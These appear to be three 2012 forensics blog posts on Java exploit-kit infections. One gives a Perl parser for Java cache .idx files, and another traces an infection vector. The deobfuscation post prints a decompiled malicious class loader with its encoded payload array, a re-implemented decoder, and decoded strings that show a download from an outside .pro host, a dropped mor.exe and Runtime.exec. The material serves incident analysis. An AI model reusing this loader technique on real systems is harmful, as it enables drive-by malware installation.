Wednesday, 15 August 2012

Java Forensics using TLN Timelines

Following on from my last two posts, I thought it might be a good time to see how we can introduce some of the Java artifacts we've reviewed into our timelines. I decided to create a Perl script to parse the .idx files within the Java cache into TLN format for import into a timeline. I hope that this script will give analysts greater context in their investigations and also a quick way to eyeball the URLs within the .idx files for anything potentially malicious. It's important to note again that this script is in BETA and further testing is required before you should trust its results in your own investigations.

I had a strong response to my last post on TLN and browser forensics; however, a number of readers had issues when copying the code and attempting to run it, with errors such as "Can't find string terminator "EOT" anywhere before EOF at C:\idx.pl line 31". If you get this error, it's most likely that the EOT line closing the here-document at the very end of the file picked up whitespace when it was copied: Perl requires the terminator alone on its line, so remove the two spaces after EOT and the one space before it. I'm also in the process of organising a Google Code repository, which should resolve that issue.

With that said, let's take a look at the script.


#! c:\perl\bin\perl.exe
#---------------------------------------------------------------------
# idx.pl
# Parse .idx files within the Java cache to TLN format
#
# Version: 0.1 (BETA)
# Examples:
# 1335156604|JAVA|WORKSTATIONNAME|USERNAME|http://malicious_site.com.br/js/jar//fap4.jar?r=1051139
# 1347043129|JAVA|WORKSTATIONNAME|USERNAME|http://www.malicious_site.pro/P4fLBitJ-PxK2/yUA83mE
# 1347043127|JAVA|WORKSTATIONNAME|USERNAME|http://www.malicious_site.pro/SfLBitJ-PxK2/yUA83mE
#---------------------------------------------------------------------
use strict;
use warnings;
use Getopt::Long;
use File::Find;
use Regexp::Common qw /URI/;
use Time::Local;

my %config = ();
Getopt::Long::Configure("prefix_pattern=(-|\/)");
GetOptions(\%config, qw(path|p=s system|s=s user|u=s help|?|h));
if ($config{help} || ! %config) {
    _syntax();
    exit 1;
}
die "You must enter a path.\n" unless ($config{path});
die "Path not found.\n" unless (-e $config{path});

my $path = $config{path};
my @files;
my %months = ('Jan'=>'01','Feb'=>'02','Mar'=>'03','Apr'=>'04','May'=>'05','Jun'=>'06','Jul'=>'07','Aug'=>'08','Sep'=>'09','Oct'=>'10','Nov'=>'11','Dec'=>'12');

# Walk the cache directory and collect every regular file under it
find(
  sub { push @files, $File::Find::name unless -d; },
  $path
);

for my $file (@files) {
    next unless $file =~ /\.idx$/i;
    $file =~ s/\\/\//g;
    open( my $fh, '<', $file ) or die "Can't open $file : $!";
    binmode($fh);
    # Slurp the whole entry rather than the first "line": the header is not line-oriented
    my $data = do { local $/; <$fh> };
    close($fh);
    next unless defined $data;
    # Timestamps appear as "DD Mon YYYY HH:MM:SS" in the date and last-modified headers
    my @timestamps = $data =~ m/[0-3][0-9] [A-Z][a-z][a-z] [0-9][0-9][0-9][0-9] [0-2][0-9]:[0-5][0-9]:[0-5][0-9]/g;
    my @url = $data =~ m/($RE{URI}{HTTP}{-scheme => qr(https?)})/g;
    # The second match is the "date" header (time of the fetch); skip entries that lack it
    if (@timestamps < 2) {
        warn "No date header found in $file, skipping\n";
        next;
    }
    my $epoch = getEpoch($timestamps[1]);
    my $url   = defined $url[0] ? $url[0] : '';
    print join('|', $epoch, 'JAVA', $config{system} || '', $config{user} || '', $url), "\n";
}

# "DD Mon YYYY HH:MM:SS" -> seconds since the epoch, treated as UTC
sub getEpoch {
    my ($dd, $mon, $yyyy, $hms) = split / /, $_[0];
    my ($hr, $min, $sec) = split /:/, $hms;
    my $mm = $months{$mon};
    die "Unknown month '$mon' in '$_[0]'\n" unless defined $mm;
    return timegm($sec, $min, $hr, $dd, $mm - 1, $yyyy);
}

sub _syntax {
print <<"EOT";
idx.pl
[option]
Parse Java cache IDX files
 -p Path..................path to java cache
 -s Systemname............add systemname to appropriate field in tln file
 -u user..................add user (or SID) to appropriate field in tln file
 -h ......................Help (print this information)
Ex: C:\\> idx.pl -p "C:\\Documents and Settings\\userprofile\\Application Data\\Sun\\Java\\Deployment\\cache\\" -s %COMPUTERNAME% -u %USERNAME% > events.txt
**All times printed as GMT/UTC
copyright 2012 Sploit
EOT
}

I'm not a programmer by any means, so I do my best with my coding, but if anybody has any views on improvements for performance or bugs then let me know. I'm not sure whether it's possible to have an .idx file without any of the values I'm looking for, so if you have any .idx files that don't have a date listed within them then my script will most likely fail. I've also added some examples of what the output looks like within the script, but I'll list them here as well to highlight some examples.


  # 1335156604|JAVA|WORKSTATIONNAME|USERNAME|http://malicious_site.com.br/js/jar//fap4.jar?r=1051139   
  # 1347043129|JAVA|WORKSTATIONNAME|USERNAME|http://www.malicious_site.pro/P4fLBitJ-PxK2/yUA83mE   
  # 1347043127|JAVA|WORKSTATIONNAME|USERNAME|http://www.malicious_site.pro/SfLBitJ-PxK2/yUA83mE   

Also to note, in regards to IDX files: there are typically two timestamps within an IDX file, one listed as "date" and one as "last modified". In this instance I'm using the "date" value to produce the TLN entry, as from what I've seen this seems to be the time the incident occurred.
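As an added example (not the post's Perl script, and not claiming anything about the .idx binary layout beyond the headers the post relies on), here is the same conversion in Python with the missing-timestamp case handled rather than left to fail. The sample .idx content, the workstation and user names, and the example.invalid URL are all constructed for the demonstration.

```python
import calendar
import re
from typing import Optional

# CONSTRUCTED sample of the text the post's script keys on inside an .idx
# entry: a URL plus "last-modified" and "date" headers. This is not a real
# cache entry and makes no claim about the binary bytes around the headers.
SAMPLE_IDX = (
    b"\x00\x00\x00\x00\x00\x01"
    b"http://www.example.invalid/applet/payload.jar\x00"
    b"last-modified\x00Tue, 14 Aug 2012 09:00:00 GMT\x00"
    b"date\x00Wed, 15 Aug 2012 10:00:00 GMT\x00"
)

MONTHS = {m: i for i, m in enumerate(
    ("Jan", "Feb", "Mar", "Apr", "May", "Jun",
     "Jul", "Aug", "Sep", "Oct", "Nov", "Dec"), start=1)}

# Same shape the Perl regex matches: "DD Mon YYYY HH:MM:SS"
TS_RE = re.compile(
    rb"([0-3]\d) ([A-Z][a-z]{2}) (\d{4}) ([0-2]\d):([0-5]\d):([0-5]\d)")
# Stop the URL at a NUL, whitespace or quote; the cache stores it as a C-style string
URL_RE = re.compile(rb"https?://[^\x00\s\"'<>]+")


def to_epoch(day: bytes, mon: bytes, year: bytes,
             hh: bytes, mm: bytes, ss: bytes) -> int:
    """UTC epoch for the matched groups; raises KeyError on a bogus month."""
    return calendar.timegm((int(year), MONTHS[mon.decode("ascii")], int(day),
                            int(hh), int(mm), int(ss), 0, 0, 0))


def idx_to_tln(data: bytes, system: str, user: str,
               fallback_epoch: Optional[int] = None) -> Optional[str]:
    """Build one TLN line (epoch|JAVA|system|user|url) from .idx contents.

    Mirrors the post's choice of the second timestamp (the "date" header)
    but degrades instead of dying: with one timestamp it uses that one,
    with none it uses fallback_epoch (for example the .idx file's own
    mtime from the directory listing), and with neither it returns None.
    """
    stamps = TS_RE.findall(data)
    if len(stamps) >= 2:
        epoch = to_epoch(*stamps[1])
    elif stamps:
        epoch = to_epoch(*stamps[0])
    elif fallback_epoch is not None:
        epoch = fallback_epoch
    else:
        return None
    m = URL_RE.search(data)
    url = m.group().decode("ascii", "replace") if m else ""
    return "|".join((str(epoch), "JAVA", system, user, url))


if __name__ == "__main__":
    print(idx_to_tln(SAMPLE_IDX, "WORKSTATIONNAME", "USERNAME"))
```

Run it over real entries by passing `open(path, "rb").read()` for each .idx and the file's own mtime as `fallback_epoch`; the line format matches the Perl output, so both can be merged into the same TLN timeline.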

Let me know if you find this script of value and if you find any bugs. As mentioned, I'll hopefully upload the script to my own Google Code repository shortly, and I'll let you all know when that is available in case you're having any trouble getting it to work.




Thursday, 9 August 2012

Java Exploit Toolkits - Part 2: Deobfuscating Java Exploit Toolkits

Let's continue with Part 2 of the series on Java Exploit Toolkits. The following post is a beginner's attempt to deobfuscate an obfuscated JAR file (what a tongue twister), and I hope that by posting my attempt others may be able to comment on more efficient ways to conduct this deobfuscation.

The reason I posted Part 1 of this series is that this particular incident was very similar. It was only due to my experience from the previous incident that I was able to quickly identify artifacts of interest in the incident I will now discuss.

Again I received an image of a machine and was notified that antivirus had detected the following file:

 Trojan.FakeAV - C:\Documents and Settings\username\Local Settings\Application Data\{762f1d12-0d4c-e201-bd96-7cb3501bb3b0}\n  

I immediately noticed the similarity between this incident and my previous one. I decided to start with the event logs again; however, in this instance I found a single entry and no Tamper Protection events as I had in Part 1:

 Security Risk Found!Trojan.FakeAV in File: C:\Documents and Settings\username\Local Settings\Application Data\{762f1d12-0d4c-e201-bd96-7cb3501bb3b0}\n by: Auto-Protect scan. Action: Cleaned by Deletion. Action Description: The file was deleted successfully.   

I decided that the next logical step would be to create a directory listing and review what occurred around the time of the alert. Reviewing the directory listing I did not find any artifacts of interest. Based on my knowledge of the previous incident, I decided to search for .idx files within the directory listing and found the following:

 -A------- 2012-08-07 14:39:00.704 2012-08-07 14:38:57.986 c:\Documents and Settings\username\Application Data\Sun\Java\Deployment\cache\6.0\lastAccessed  
 -A------- 2012-08-07 14:39:00.689 2012-08-07 14:39:00.658 c:\Documents and Settings\username\Application Data\Sun\Java\Deployment\cache\6.0\23\74367697-78280468.idx  
 -A------- 2012-08-07 14:39:00.673 2012-08-07 14:39:00.658 c:\Documents and Settings\username\Application Data\Sun\Java\Deployment\cache\6.0\23\74367697-78280468  
 D-------- 2012-08-07 14:39:00.673 2012-08-07 14:38:49.79 c:\Documents and Settings\username\Application Data\Sun\Java\Deployment\cache\6.0\23\..  
 D-------- 2012-08-07 14:39:00.673 2012-08-07 14:38:49.79 c:\Documents and Settings\username\Application Data\Sun\Java\Deployment\cache\6.0\23\.  
 D-------- 2012-08-07 14:39:00.673 2012-08-07 14:38:49.79 c:\Documents and Settings\username\Application Data\Sun\Java\Deployment\cache\6.0\23  
 D-------- 2012-08-07 14:38:57.986 2012-08-07 14:38:48.954 c:\Documents and Settings\username\Application Data\Sun\Java\Deployment\cache\6.0\..  
 D-------- 2012-08-07 14:38:57.986 2012-08-07 14:38:48.954 c:\Documents and Settings\username\Application Data\Sun\Java\Deployment\cache\6.0\.  
 D-------- 2012-08-07 14:38:57.986 2012-08-07 14:38:48.954 c:\Documents and Settings\username\Application Data\Sun\Java\Deployment\cache\6.0  
 -A------- 2012-08-07 14:38:57.954 2012-08-07 14:38:56.908 c:\Documents and Settings\username\Application Data\Sun\Java\Deployment\cache\6.0\57\bffc1b9-44cf1245.idx  
 D-------- 2012-08-07 14:38:57.470 2012-08-07 14:38:49.236 c:\Documents and Settings\username\Application Data\Sun\Java\Deployment\cache\6.0\57\..  
 D-------- 2012-08-07 14:38:57.470 2012-08-07 14:38:49.236 c:\Documents and Settings\username\Application Data\Sun\Java\Deployment\cache\6.0\57\.  
 D-------- 2012-08-07 14:38:57.470 2012-08-07 14:38:49.236 c:\Documents and Settings\username\Application Data\Sun\Java\Deployment\cache\6.0\57  
 -A------- 2012-08-07 14:38:57.454 2012-08-07 14:38:57.64 c:\Documents and Settings\username\Application Data\Sun\Java\Deployment\cache\6.0\57\bffc1b9-44cf1245  
 -A------- 2012-08-07 14:38:55.64 2012-08-07 14:38:55.64 c:\Documents and Settings\username\Application Data\Sun\Java\Deployment\cache\6.0\host\c312ea1-3e1f76dc.hst  
 D-------- 2012-08-07 14:38:55.64 2012-08-07 14:38:48.970 c:\Documents and Settings\username\Application Data\Sun\Java\Deployment\cache\6.0\host\..  
 D-------- 2012-08-07 14:38:55.64 2012-08-07 14:38:48.970 c:\Documents and Settings\username\Application Data\Sun\Java\Deployment\cache\6.0\host\.  
 -A------- 2012-08-07 14:38:50.892 2012-08-07 14:38:48.673 c:\Documents and Settings\username\Application Data\Sun\Java\Deployment\deployment.properties  
 -A------- 2012-08-07 14:38:50.829 2012-08-07 14:38:50.829 c:\Documents and Settings\username\Local Settings\Temp\java_install_reg.log  

At this point I wasn't sure whether the following .idx files were part of the incident, but I decided, based on the previous incident, that they might be a good place to start.

74367697-78280468.idx

bffc1b9-44cf1245.idx

At this point the URLs discovered in these files definitely looked suspicious, but I still needed more information to decide. I decided the next step was to start looking at the other files from the listing above (the cache entries that share a name with each .idx file):

74367697-78280468

I exported the file listed above and uploaded it to VirusTotal. Here are the results. Although there were only 3 hits, that was enough to raise further suspicion of the file. I renamed the file with a .jar extension and attempted to open it with JD-GUI, unfortunately without success. I also attempted to rename the file to .exe and run it through Anubis, but I wasn't able to do that either. At this point I wasn't really sure what my next step with the file could be, so I decided to move on and focus on the other file. If anybody has any advice on this file I'd be keen to hear what my next steps might be.

bffc1b9-44cf1245

Again I uploaded the file listed above to VirusTotal to confirm any detections. Here are the results. At this point I was fairly sure that I'd identified the initial infection vector. Once again I added the .jar extension to the file and attempted to open it with JD-GUI: SUCCESS! Here is the initial view I had when opening the file in JD-GUI:

I reviewed each of the classes above. The first two basically seemed to be obfuscation and padding techniques to avoid antivirus, so I decided to spend my time focusing on O3. Below is what I saw when opening O3:


 import java.lang.reflect.Method;  
 import java.net.URL;  
 import java.security.CodeSource;  
 import java.security.Permissions;  
 import java.security.ProtectionDomain;  
 import java.security.cert.Certificate;  
 class O3 extends ClassLoader  
 {  
  static ProtectionDomain pd;  
  public static char char_at(String paramString, int paramInt)  
  {  
   return paramString.charAt(paramInt);  
  }  
  public static Method get_func(Class paramClass) throws Exception  
  {  
   return paramClass.getClass().getMethod("newInstance", new Class[0]);  
  }  
  public static void invoke(Method paramMethod, Class paramClass) throws Exception  
  {  
   paramMethod.invoke(paramClass, new Object[0]);  
  }  
  public static String get_perm_name()  
  {  
   return new StringBuffer("setSec").toString() + "urityManager";  
  }  
  public static byte[] string_to_bytes(String paramString)  
  {  
   byte[] arrayOfByte = new byte[paramString.length() / 2];  
   try  
   {  
    Permissions localPermissions = new Permissions();  
    localPermissions.add(new RuntimePermission(get_perm_name()));  
    pd = new ProtectionDomain(new CodeSource(new URL(new StringBuffer("file:").toString() + "///"), new Certificate[0]), localPermissions);  
   }  
   catch (Exception localException) {  
   }  
   int i = paramString.length();  
   for (int j = 0; j < i; j += 2)  
   {  
    int k = (Character.digit(char_at(paramString, j), 16) << 4) + Character.digit(char_at(paramString, j + 1), 16);  
    k = (k - 3) % 256;  
    arrayOfByte[(j / 2)] = (byte)k;  
   }  
   return arrayOfByte;  
  }  
  public static void load(O3 paramO3)  
  {  
   try  
   {  
    int i = 1;  
    String[] arrayOfString = { "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", "2323232323232323232323232323232323232323232323232323232323232323", "2323232323232323232323232323232323232323232323232323232323232323", "2323232323232323232323232323232323232323232323232323232323232323", "2323232323232323232323232323232323232323232323232323232323232323", "2323232323232323232323232323232323232323232323232323232323232323", "2323232323232323232323232323232323232323232323232323232323232323", "23232323232323232323232323232323232323234B5757733D32327A7A7A3170", "6C716873666C31737572325337694F456C774D30537B4E35327C58443B367048", "0A03670F036803690F032C036A0F036B036C0F032C036D04031F6D647964326C7232457869696875686752787773787756777568647004031B6D647964326C7232496C6F685278777378775677756864700403196D647964326F64716A325677756C716A457869696875040307574850530F036E036F0F0370037104030B3270727531687B680F037203690F032C03730F03740375040308", "333333373A", "0A03760F03770378040308", "3333343439", "040308", "3333343533", "040308", "3333333A37", "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" };  
    StringBuilder localStringBuilder = new StringBuilder();  
    for (int j = 0; j < arrayOfString.length; j++)  
    {  
     localStringBuilder.append(arrayOfString[j]);  
    }  
    byte[] arrayOfByte = string_to_bytes(localStringBuilder.toString());  
    Class localClass = paramO3.defineClass(null, arrayOfByte, 0, arrayOfByte.length, pd);  
    invoke(get_func(localClass), localClass);  
   }  
   catch (Exception localException)  
   {  
   }  
  }  
 }  

Basically, from what I can gather from this class file, load() builds an array of hex strings (the long array passed to the StringBuilder), concatenates them, and passes the result to the public static byte[] string_to_bytes(String paramString) method, which deobfuscates it by taking each pair of hex digits and subtracting 3 modulo 256. The decoded bytes are then handed to defineClass() with a ProtectionDomain that carries the setSecurityManager RuntimePermission, and the resulting class is instantiated via newInstance(), so the real payload is a second class file loaded straight from memory and never written to disk as-is. At this point I was pretty lost, as I wanted to deobfuscate the string in the hope that it might give me a better understanding and potentially some new artifacts to search for within my image.

I decided to create my own Java application based on the class above. It would be a good chance for me to dust off some of the Java skills that I'd so happily left in the past. I installed the Java JDK and then downloaded the Eclipse IDE, which I was familiar with.

I created the following class based on the output above; again, this is where I'm sure there are more efficient ways of doing this. My aim was to write a text file containing the deobfuscated content. My class is as follows:

import java.io.*;

// Standalone re-implementation of the O3 decoder: concatenates the hex
// strings, reverses the (k - 3) % 256 transform and writes the result out.
public class exploitMain {

  public static void main(String[] args) {
    load();
  }

  public static char char_at(String paramString, int paramInt)
  {
    return paramString.charAt(paramInt);
  }

  // Identical to O3.string_to_bytes() minus the ProtectionDomain setup,
  // which is only needed when the bytes are going to be passed to defineClass()
  public static byte[] string_to_bytes(String paramString)
  {
    byte[] arrayOfByte = new byte[paramString.length() / 2];
    int i = paramString.length();
    for (int j = 0; j < i; j += 2)
    {
      int k = (Character.digit(char_at(paramString, j), 16) << 4) + Character.digit(char_at(paramString, j + 1), 16);
      k = (k - 3) % 256;
      arrayOfByte[(j / 2)] = (byte)k;
    }
    return arrayOfByte;
  }

  public static void load()
  {
    try
    {
      String[] arrayOfString = { "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", "2323232323232323232323232323232323232323232323232323232323232323", "2323232323232323232323232323232323232323232323232323232323232323", "2323232323232323232323232323232323232323232323232323232323232323", "2323232323232323232323232323232323232323232323232323232323232323", "2323232323232323232323232323232323232323232323232323232323232323", "2323232323232323232323232323232323232323232323232323232323232323", "23232323232323232323232323232323232323234B5757733D32327A7A7A3170", "6C716873666C31737572325337694F456C774D30537B4E35327C58443B367048", "0A03670F036803690F032C036A0F036B036C0F032C036D04031F6D647964326C7232457869696875686752787773787756777568647004031B6D647964326C7232496C6F685278777378775677756864700403196D647964326F64716A325677756C716A457869696875040307574850530F036E036F0F0370037104030B3270727531687B680F037203690F032C03730F03740375040308", "333333373A", "0A03760F03770378040308", "3333343439", "040308", "3333343533", "040308", "3333333A37", "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" };
      StringBuilder localStringBuilder = new StringBuilder();
      for (int j = 0; j < arrayOfString.length; j++)
      {
        localStringBuilder.append(arrayOfString[j]);
      }
      byte[] arrayOfByte = string_to_bytes(localStringBuilder.toString());
      String temp = bytesToStringUTFCustom(arrayOfByte);
      writeToText(temp);
    }
    catch (Exception localException)
    {
      // Don't swallow errors silently as the loader does; we want to know why it failed
      localException.printStackTrace();
    }
  }

  // Map each byte to the char with the same value (ISO-8859-1 style). The
  // mask matters: a bare (char) cast of a negative byte sign-extends it
  // and turns every high byte into an unrelated Unicode character.
  public static String bytesToStringUTFCustom(byte[] bytes) {
    char[] buffer = new char[bytes.length];
    for (int i = 0; i < bytes.length; i++) {
      buffer[i] = (char)(bytes[i] & 0xFF);
    }
    return new String(buffer);
  }

  public static void writeToText(String output) throws IOException {
    File file = new File("c:/output.txt");
    BufferedWriter bo = new BufferedWriter(new FileWriter(file));
    bo.write(output);
    bo.close();
  }
}

It was rushed, so it's fairly messy and I haven't commented it. If you want to know anything further about it please feel free to leave some comments and I'll get back to you as soon as I can. Finally, I reviewed my text file for further information.

 ????  0 ~  
  ' 2  
  3 4  5  
  6 7  8  9  
  6 :  ;  <  =  
  > ?  
        @  
        A  
    B  C  D  E  
    2  F  
  6 G  
    H  I  
    J  
    @  
    K  
    L  M  
  N O  P  Q  R  
    S  
    T  
    T  
  U V  
  U W  X  Y  Z  [   <init>   ()V   Code   LineNumberTable   run   ()Ljava/lang/Object;    
 Exceptions    
 SourceFile   CL4.java  ) *  \  ] ^  'java/security/PrivilegedActionException  _  ` a   http.keepalive   false  b c   java/io/BufferedInputStream   java/net/URL                                                                                                             HTTp://www.XXXXXXX.pro/P4fLBitJ-PxK2/yUA83mE  d  e f  ) g  h i  ) j   java/io/BufferedOutputStream   java/io/FileOutputStream   java/lang/StringBuffer   TEMP  k l  m n   /mor.exe  o f  ) p  q r   00047  s  t u   00116   00120   00074  v w  x *  y  z {  | }   java/lang/Exception   CL4   java/lang/Object  'java/security/PrivilegedExceptionAction   java/security/AccessController   doPrivileged  =(Ljava/security/PrivilegedExceptionAction;)Ljava/lang/Object;   java/lang/System   setSecurityManager   (Ljava/lang/SecurityManager;)V   setProperty  8(Ljava/lang/String;Ljava/lang/String;)Ljava/lang/String;   java/lang/String   trim   ()Ljava/lang/String;   (Ljava/lang/String;)V    
 openStream   ()Ljava/io/InputStream;   (Ljava/io/InputStream;)V   getenv  &(Ljava/lang/String;)Ljava/lang/String;   append  ,(Ljava/lang/String;)Ljava/lang/StringBuffer;   toString   (Ljava/io/OutputStream;I)V   read   ([BII)I   java/lang/Integer   parseInt   (Ljava/lang/String;)I   write   ([BII)V   close   java/lang/Runtime    
 getRuntime   ()Ljava/lang/Runtime;   exec  '(Ljava/lang/String;)Ljava/lang/Process; ! & '   (      ) *   +  >       *?  *?  W?  L?                 ,                               
      - .   +  ?      & ?     ? L = >    ?  W?  Y?      Y   
 ?  ?  ?   
 ?  : ?  Y?  Y?  Y?    ?  ?    ?  ?  ?     ?  :   +    ?  Y=? ?  `> 6    ? x  d  `   ?  ? i  d  ` p?  +  \3  ?  ??T? H  d  ` p ?  +  \3  ?  ??T? ,  d  ` p ?  +  \3  ?  ??T?  +  \3  ?  ??T?  ???  +  ? ??g  ? !  ? "? #:   ?  Y?    ?  ?    ?  ?  ? $W?  L ?       # %   ,  n            
            .   X   g ! k " t $ ? & ? ( ? * ? , ? . ? 0 ? 2 ? 6 ? " ? 9 ? ; ? < ? =   >  C # @ $ D /      %   0    1  


It's difficult to make this output easy to read. The areas of interest are the strings in the constant pool: in particular it shows an additional file (mor.exe, written under the directory named by the TEMP environment variable, going by the "TEMP", "getenv" and "/mor.exe" strings) and a URL on the same site we'd previously discovered, along with calls to setSecurityManager and Runtime.exec. Overall I was fairly happy to find an additional artifact to search for, which unfortunately I did not find in this instance.
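The string_to_bytes() transform is simple enough to redo outside Java, and dumping raw bytes into a text file is what makes the output above so hard to read. The following Python, added here and not part of the original post or of the malware, decodes the hex chunks exactly the way the O3 loader does and then pulls printable strings out of the result, which is usually enough to surface URLs, file names and size constants without a decompiler. The sample chunks are the padding and two of the numeric constants visible in the array above (the URL-bearing chunks are deliberately left out); the class-magic check uses the encoding any CAFEBABE header would have under this scheme, which is a derived value rather than something taken from the page.

```python
import re
from typing import List

# Three chunks copied from the visible part of the O3 string array:
# padding, then the constants that decode to "00047" and "00116".
# This is a constructed subset, not the full payload.
SAMPLE_CHUNKS = [
    "2323232323232323",
    "333333373A",
    "3333343439",
]

JAVA_CLASS_MAGIC = b"\xca\xfe\xba\xbe"


def decode_hex_chunks(chunks: List[str]) -> bytes:
    """Concatenate the hex chunks and reverse the loader's encoding.

    The loader reads two hex digits into k and stores (k - 3) % 256 as a
    byte. Java's % keeps the sign of the dividend, so for k < 3 the result
    is negative, but the narrowing (byte) cast leaves the same bit pattern
    that Python's always-positive (k - 3) % 256 yields, so the two
    implementations agree byte for byte (0x00 decodes to 0xFD in both).
    """
    joined = "".join(chunks)
    if len(joined) % 2:
        raise ValueError("odd number of hex digits")
    out = bytearray()
    for i in range(0, len(joined), 2):
        k = int(joined[i:i + 2], 16)
        out.append((k - 3) % 256)
    return bytes(out)


def is_class_file(data: bytes) -> bool:
    """A decoded Java class has to start with the CAFEBABE magic."""
    return data[:4] == JAVA_CLASS_MAGIC


def printable_strings(data: bytes, min_len: int = 4) -> List[str]:
    """Equivalent of strings(1): runs of printable ASCII at least min_len long."""
    pattern = rb"[\x20-\x7e]{%d,}" % min_len
    return [m.group().decode("ascii") for m in re.finditer(pattern, data)]


if __name__ == "__main__":
    payload = decode_hex_chunks(SAMPLE_CHUNKS)
    print("class magic present:", is_class_file(payload))
    for s in printable_strings(payload):
        print(s.strip())
```

Writing `decode_hex_chunks(...)` straight to a `.class` file and opening that in JD-GUI (or `javap -c -p`) is the quicker route to readable source once the full array is available; the strings pass is what you run when you only want the indicators to search for.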

I hope you find this useful, and hopefully some of you may comment on more efficient ways of doing what I've done above. I'd love any advice from anyone who does this more regularly.








Java Exploit Toolkits - Part 1: Finding The Initial Infection Vector

So before I start, I'd like to thank Corey Harrell for the following fantastic posts on finding the initial attack vector, and in particular for highlighting some of the Java artifacts an analyst might expect to see from a Java exploit toolkit.

If you haven't seen the posts already, then I highly recommend you review the following posts by Corey:

Finding the Initial Infection Vector
Malware Root Cause Analysis

This post will follow Corey's guide to finding the initial attack vector, in this case a Java exploit toolkit, and will lead into my next post, Java Exploit Toolkits - Part 2: Deobfuscating Java Exploit Toolkits.

Let's get started.

I was presented with an image of a workstation that had raised a single virus alert, which had detected the following file:

 Backdoor. Trojan - C:\Windows\Installer{a01f369f-9731-282d-71b6-e8855551185f}\n  


I decided to start with the Windows event logs and review those to see if there were any other virus detections and to confirm the information I'd been provided. As suspected, I found the original alert but also a few more, which I've listed below (note: the actual username has been replaced with 'username'):

 Security Risk Found!Backdoor.Trojan in File: C:\Documents and Settings\username\Local Settings\Application Data\{a01f369f-9731-282d-71b6-e8855551185f}\n by: Auto-Protect scan. Action: Cleaned by Deletion. Action Description: The file was deleted successfully.  
 Security Risk Found!Trojan.Maljava!gen23 in File: C:\Documents and Settings\username\Application Data\Sun\Java\Deployment\cache\javapi\v1.0\jar\U7DbO-18afaa21-3d6ae555.zip by: Auto-Protect scan. Action: Quarantine succeeded : Access denied. Action Description: The file was quarantined successfully.  
 Security Risk Found!Trojan.Gen in File: C:\Documents and Settings\All Users\Application Data\6C82D11B21D185215B60FBE17B07D287\6C82D11B21D185215B60FBE17B07D287.exe by: Auto-Protect scan. Action: Quarantine succeeded : Access denied. Action Description: The file was quarantined successfully.   


On reviewing the events I also found that Symantec Antivirus Tamper Protection had reported, seven (7) days earlier, that two processes had attempted to terminate the antivirus components (both attempts were blocked):

 SYMANTEC TAMPER PROTECTION ALERT Target: C:\Program Files\Symantec\Symantec Endpoint Protection\SmcGui.exe Event Info: Terminate Process Action Taken: Blocked Actor Process: C:\Documents and Settings\username\Local Settings\Temp\3E8.tmp (PID 2936)   
 SYMANTEC TAMPER PROTECTION ALERT Target: C:\Program Files\Common Files\Symantec Shared\ccApp.exe Event Info: Terminate Process Action Taken: Blocked Actor Process: C:\Documents and Settings\All Users\Application Data\6C82D11B21D185215B60FBE17B07D287\6C82D11B21D185215B60FBE17B07D287.exe (PID 860)  

The next step I followed was to create a directory listing of the image and review the events that occurred on disk around the time that the Tamper Protection events had started.

 -A------- 2012-07-30 20:14:38.100 2012-07-30 20:14:37.850 c:\Documents and Settings\username\Application Data\Sun\Java\Deployment\cache\javapi\v1.0\jar\U7DbO-18afaa21-3d6ae555.idx  
 -A------- 2012-07-30 20:14:38.69 2012-07-30 20:14:37.882 c:\Documents and Settings\username\Application Data\Sun\Java\Deployment\cache\javapi\v1.0\jar\U7DbO-18afaa21-3d6ae555.zip  
 D-------- 2012-07-30 20:14:37.850 2012-07-11 19:06:34.285 c:\Documents and Settings\username\Application Data\Sun\Java\Deployment\cache\javapi\v1.0\jar\..  
 D-------- 2012-07-30 20:14:37.850 2012-07-11 19:06:34.285 c:\Documents and Settings\username\Application Data\Sun\Java\Deployment\cache\javapi\v1.0\jar\.  
 D-------- 2012-07-30 20:14:37.850 2012-07-11 19:06:34.285 c:\Documents and Settings\username\Application Data\Sun\Java\Deployment\cache\javapi\v1.0\jar  
 -A------- 2012-07-30 20:14:37.272 2012-07-11 19:06:34.473 c:\Documents and Settings\username\Application Data\Sun\Java\Deployment\log\plugin150_06.trace  
 -A------- 2012-07-30 20:14:34.741 2012-07-11 19:06:34.160 c:\Documents and Settings\username\Local Settings\Temp\java_install_reg.log  

Thanks to the posts by Corey that I highlighted earlier, I immediately focused on the Java artifacts he'd mentioned. I could see that the user in question was browsing with Internet Explorer (not shown above) at the time the events were generated, and also that the artifacts listed above (the .idx and .zip pair in the javapi cache) were created around the time in question. Unfortunately, as we saw above, antivirus had already quarantined the zip file, so I would not be able to open it with JD-GUI.

Instead I decided to focus on the .idx file and at least attempt to identify the website that had dropped the malware. I opened the .idx file and viewed the following (note: I've removed the malicious URL and replaced it with 'x'):



So by now I realised that the user had been browsing the web and hit the malicious website recorded in the .idx file. The zip file highlighted above had been downloaded and then executed. My final objective was to review java_install_reg.log and confirm that Java had executed. I opened the file and found the following:

 -----------------------------------------  
 == Start JNICALL Java_com_sun_deploy_util_UpdateCheck_shouldPromptForAutoCheck ==  
 -----------------------------------------  
 Process start at 07/30/2012-20:14:34.  
 -----------------------------------------  
 == Start JNICALL Java_com_sun_deploy_panel_PlatformSpecificUtils_getPublicJres ==  
 -----------------------------------------  
 Process start at 07/30/2012-20:14:34.  
 -----------------------------------------  
 == Start JNICALL Java_com_sun_deploy_util_UpdateCheck_shouldPromptForAutoCheck ==  


As mentioned, all this was possible due to Corey's posts. This post doesn't highlight anything beyond the information Corey has already provided. My goal was to provide another example for anyone interested, and also to set the scene for Part 2 of this guide, where I'll discuss a beginner's attempt at deobfuscating Java exploit toolkits.